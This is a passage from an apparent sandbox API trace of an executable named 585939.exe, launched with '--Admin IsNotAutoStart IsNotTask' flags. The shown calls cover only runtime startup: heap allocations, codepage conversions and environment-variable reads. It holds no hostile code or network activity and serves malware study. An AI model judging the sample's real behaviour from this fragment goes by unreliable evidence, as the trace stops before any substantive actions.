(hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0120.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0120.089] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0120.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x63f300 [0120.089] GetCurrentThreadId () returned 0x968 [0120.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x632150 [0120.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x63f6c8 [0120.096] GetStartupInfoW (in: lpStartupInfo=0x18ece8 | out: lpStartupInfo=0x18ece8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x263bfab6, hStdError=0x58)) [0120.097] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0120.097] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.097] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask" [0120.097] GetEnvironmentStringsW () returned 0x63fed0* [0120.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaca) returned 0x6409a8 [0120.163] FreeEnvironmentStringsW (penv=0x63fed0) returned 1 [0120.172] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb8) returned 0x63fed0 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x98) returned 0x63ff90 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x635688 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6c) returned 0x640030 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x6400a8 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x632bd0 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x640120 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63afc8 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636b88 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x63a9c0 [0120.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x63ef38 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4a) returned 0x640190 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x72) returned 0x632c50 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b000 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63b038 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x63ef60 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd2) returned 0x6401e8 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x6402c8 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x640350 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x6356d0 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x640390 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63a9f0 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b070 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x640428 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636bd8 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x640468 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x635718 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x82) returned 0x6404c8 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63b0a8 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63ef88 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x63b0e0 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x640558 [0120.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x6405b8 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63b118 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x635760 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x640618 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63aa20 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b150 [0120.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x640678 [0120.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6409a8 | out: hHeap=0x620000) returned 1 [0120.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x640710 [0120.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x640f18 [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetACP () returned 0x4e4 [0120.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x640fa0 [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] IsValidCodePage (CodePage=0x4e4) returned 1 [0120.304] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecdc | out: lpCPInfo=0x18ecdc) returned 1 [0120.311] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7a4 | out: lpCPInfo=0x18e7a4) returned 1 [0120.317] GetLastError () returned 0x0 [0120.317] SetLastError (dwErrCode=0x0) [0120.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0120.323] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e7b8 | out: lpCharType=0x18e7b8) returned 1 [0120.323] GetLastError () returned 0x0 [0120.323] SetLastError (dwErrCode=0x0) [0120.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0120.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0120.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0120.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18eab8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFû;&ôì\x18", lpUsedDefaultChar=0x0) returned 256 [0120.330] GetLastError () returned 0x0 [0120.330] SetLastError (dwErrCode=0x0) [0120.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e508, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0120.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0120.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e2f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0120.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9b8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFû;&ôì\x18", lpUsedDefaultChar=0x0) returned 256 [0120.337] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0120.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40d9f2 [0120.374] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640f18) returned 0x80 [0120.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0120.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1f) returned 0x63efb0 [0120.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63efb0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0120.400] GetLastError () returned 0x0 [0120.400] SetLastError (dwErrCode=0x0) [0120.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6411c8 [0120.400] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6411c8) returned 0x4 [0120.400] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6411c8, Size=0x8) returned 0x6411c8 [0120.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0120.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x6411d8 [0120.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6411d8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0120.401] GetLastError () returned 0x0 [0120.401] SetLastError (dwErrCode=0x0) [0120.401] GetLastError () returned 0x0 [0120.401] SetLastError (dwErrCode=0x0) [0120.401] GetLastError () returned 0x0 [0120.401] SetLastError (dwErrCode=0x0) [0120.410] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6411c8) returned 0x8 [0120.410] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6411c8, Size=0xc) returned 0x641218 [0120.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0120.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x37) returned 0x641230 [0120.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x641230, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0120.410] GetLastError () returned 0x0 [0120.410] SetLastError (dwErrCode=0x0) [0120.410] GetLastError () returned 0x0 [0120.410] SetLastError (dwErrCode=0x0) [0120.410] GetLastError () returned 0x0 [0120.410] SetLastError (dwErrCode=0x0) [0120.410] GetLastError () returned 0x0 [0120.410] SetLastError (dwErrCode=0x0) [0120.410] GetLastError () returned 0x0 [0120.410] SetLastError (dwErrCode=0x0) [0120.410] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641218) returned 0xc [0120.410] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641218, Size=0x10) returned 0x641218 [0120.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0120.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x6357a8 [0120.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, 